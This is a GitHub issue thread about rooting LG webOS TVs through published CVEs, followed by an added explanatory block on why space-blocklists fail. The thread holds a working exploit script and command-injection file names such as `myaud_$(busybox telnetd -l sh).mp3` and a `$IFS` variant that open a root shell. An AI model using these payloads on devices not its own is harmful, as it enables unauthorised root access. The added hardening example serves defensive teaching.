Recent exploits #142

Open
EndlessFractal opened this issue Apr 9, 2024 · 13 comments
EndlessFractal commented Apr 9, 2024

I wonder if it's enough for a RootMyTV v3...

https://www.cve.org/CVERecord?id=CVE-2023-6317
https://www.cve.org/CVERecord?id=CVE-2023-6318
https://www.cve.org/CVERecord?id=CVE-2023-6319
https://www.cve.org/CVERecord?id=CVE-2023-6320

Source: https://www.bitdefender.com/blog/labs/vulnerabilities-identified-in-lg-webos/

@DavidBuchanan314
Collaborator

DavidBuchanan314 commented Apr 9, 2024

Thanks, this does actually sound extremely usable. Iff we're going to do a v3 release, we should probably prioritize using these bugs since they're already known to LG. (we were also aware of some of these bugs already ;) )

@DavidBuchanan314
Collaborator

Btw do you have a source for the in-the-wild exploitation? It doesn't exactly matter for our purposes but I'd be interested to know more.

@EndlessFractal
Author

> Btw do you have a source for the in-the-wild exploitation? It doesn't exactly matter for our purposes but I'd be interested to know more.

I have misinterpreted the news. My apologies! What I meant to say was that the exploits were discovered by Bitdefender researchers, which could potentially attract the attention of malicious actors. As a security researcher, I'll keep an eye out! 👀

Cheers and my apologies again!

@illixion

Can confirm that CVE-2023-6319 (getAudioMetadata) works on my LG OLED C1 with webOS 6.0 (03.36.50), managed to successfully get root and install the homebrew app, I've also tried CVE-2023-6318 (processAnalyticsReport) but it didn't seem to work.

In case it helps, all I did was scp an MP3 and an LRC file as described in the article to `/media/developer/temp/` using the LG developer mode SSH server with names like `myaud_$(busybox telnetd -l sh).mp3`, then ran this Python script:

```python
import asyncio
from aiopylgtv import WebOsClient

HOST = "TV_IP_ADDR"

async def main():
    client = await WebOsClient.create(HOST)
    await client.connect()

    await client.luna_request("com.webos.service.attachedstoragemanager/getAudioMetadata", {
        "deviceId": "0bcef",
        "fullPath": "/media/developer/temp/myaud_$(busybox telnetd -l sh).mp3"
    })

    await client.disconnect()

if __name__ == "__main__":
    asyncio.run(main())
```

I've also tried to make an all-in-one script using com.webos.service.downloadmanager/download to push the files to the filesystem, but it blocks URLs with spaces in the name, so if anyone has a workaround then please let me know.

@DavidBuchanan314
Collaborator

@illixion I haven't tried against my TV at all but I think you'll find you can bypass the need for spaces entirely by replacing them with $IFS, i.e.

```
"/media/developer/temp/myaud_$(busybox$IFStelnetd$IFS-l$IFSsh).mp3"
```

(again, untested!)
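
Why rejecting spaces does not contain this class of bug, as an added example that is not part of the thread or of any project mentioned in it. It assumes a hypothetical service that interpolates the path into a shell command line (the real implementation is not shown on this page); the function names are illustrative and the filename is constructed, with a harmless `printf` as the substituted command.

```python
import re
import subprocess

# Constructed filename: same shape as the names in the thread, but the
# substituted command is a harmless printf. It contains no space character.
NAME = "myaud_$(printf$IFS%s$IFS-INJECTED-).mp3"

def space_blocklist_ok(path: str) -> bool:
    """The kind of filter described in the thread: reject only spaces."""
    return " " not in path

def via_shell(path: str) -> str:
    """Hypothetical vulnerable pattern: the path is pasted into a shell string.
    Double quotes do not stop the shell from expanding $(...)."""
    cmd = f'printf %s "{path}"'
    return subprocess.run(["sh", "-c", cmd],
                          capture_output=True, text=True).stdout

def via_argv(path: str) -> str:
    """Hardened pattern: no shell at all. The path is a single argv element,
    so nothing ever parses it as shell syntax."""
    return subprocess.run(["printf", "%s", path],
                          capture_output=True, text=True).stdout

# Defence in depth: allowlist of characters instead of a blocklist.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]{1,128}")

def allowlist_ok(name: str) -> bool:
    """Accept only names built from known-safe characters, not option-like."""
    return SAFE_NAME.fullmatch(name) is not None and not name.startswith("-")

if __name__ == "__main__":
    print("passes space blocklist:", space_blocklist_ok(NAME))
    print("shell sees            :", via_shell(NAME))
    print("argv sees             :", via_argv(NAME))
    print("passes allowlist      :", allowlist_ok(NAME))
```

The blocklist accepts the name, the shell path executes the substitution, and the argv path returns the name byte for byte; the allowlist rejects it before either call is reached.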

DavidBuchanan314 pinned this issue Apr 11, 2024

illixion commented Apr 11, 2024

@DavidBuchanan314 that's genius, thank you for suggesting this, after some trial and error I've landed on `/mnt/lg/appstore/internal/downloads/myaud_$(telnetd$IFS-lsh).mp3` which does work! I'll post a guide along with an updated script on my blog for those who are interested.

Edit: now published: https://blog.illixion.com/2024/04/root-lg-webos-tv/

@qnorsten

> @DavidBuchanan314 that's genius, thank you for suggesting this, after some trial and error I've landed on `/mnt/lg/appstore/internal/downloads/myaud_$(telnetd$IFS-lsh).mp3` which does work! I'll post a guide along with an updated script on my blog for those who are interested.

Looking forward to that post. Great work.

@revilo196

> Edit: now published: https://blog.illixion.com/2024/04/root-lg-webos-tv/

@illixion can confirm your script working on my TVs:
webOS 7.3.1-39 03.33.65 (OLED42C21LA)
webOS 7.3.1-43 03.33.85 (75NANO756QA)

@SteadyStatus21

SteadyStatus21 commented Apr 15, 2024

Moved to illixion/root-my-webos-tv#1 (comment).

tl;dr - webOS version 05.40.20 doesn't work for me.

@milkpirate

milkpirate commented Apr 17, 2024

@illixion does not seem to work on 😞
webOS 7.3.1-42 03.33.80 (43UQ80009LB)

Is it possible to update to a specific version? I.e. 7.3.1-43? Would not want to let my TV do it on its own...

@illixion

Please create issues related to my script in its repo instead of here, so we can have everything documented and categorized in one place: https://github.com/illixion/root-my-webos-tv

@pivoivo

pivoivo commented Apr 19, 2024

For all of that is a bit too heavy. Just to be clear. There is "still" no way (not counting the hardware method, since I do not understand there anything at all) to root a TV with 6.10.30 firmware, right?

@qnorsten

qnorsten commented Apr 22, 2024

> For all of that is a bit too heavy. Just to be clear. There is "still" no way (not counting the hardware method, since I do not understand there anything at all) to root a TV with 6.10.30 firmware, right?

Recently discovered https://github.com/throwaway96/dejavuln-autoroot should work
